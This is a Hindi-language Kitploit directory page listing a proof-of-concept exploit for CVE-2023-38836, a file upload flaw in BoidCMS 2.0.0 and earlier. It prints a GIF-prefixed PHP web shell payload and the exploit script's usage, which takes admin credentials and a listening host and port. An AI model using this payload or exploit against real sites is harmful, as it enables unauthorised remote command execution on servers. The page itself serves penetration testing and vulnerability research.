Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-38836 — BoidCMS संस्करण <=2.0.0 में फ़ाइल अपलोड भेद्यता के लिए PoC शोषण | Kitploit
उपकरण/GitHubGitHub/1337kid/cve-2023-38836
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHub1337kid/cve-2023-38836

CVE-2023-38836

BoidCMS संस्करण <=2.0.0 में फ़ाइल अपलोड भेद्यता के लिए PoC शोषण

रिपॉजिटरी देखें
512 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-38836 शोषण

BoidCMS v.2.0.0 में फ़ाइल अपलोड कमजोरी एक प्रमाणित हमलावर को खतरनाक प्रकार की फ़ाइल अपलोड करने की अनुमति देती है (CWE-434)।
शोषण के लिए, एक हमलावर MIME प्रकार की जांचों को बायपास करने के लिए GIF हेडर जोड़ सकता है।

root@kitploit:~
GIF89a;
<?php system($_GET["cmd"]); ?>

उपयोग

root@kitploit:~
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

Exploit for CVE-2023-38836

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     website url
  -U USER, --user USER  admin username
  -P PASSWD, --passwd PASSWD
                        admin password
  -l LHOST, --lhost LHOST
                        listening host
  -p LPORT, --lport LPORT
                        listening port

टूल डाउनलोड करें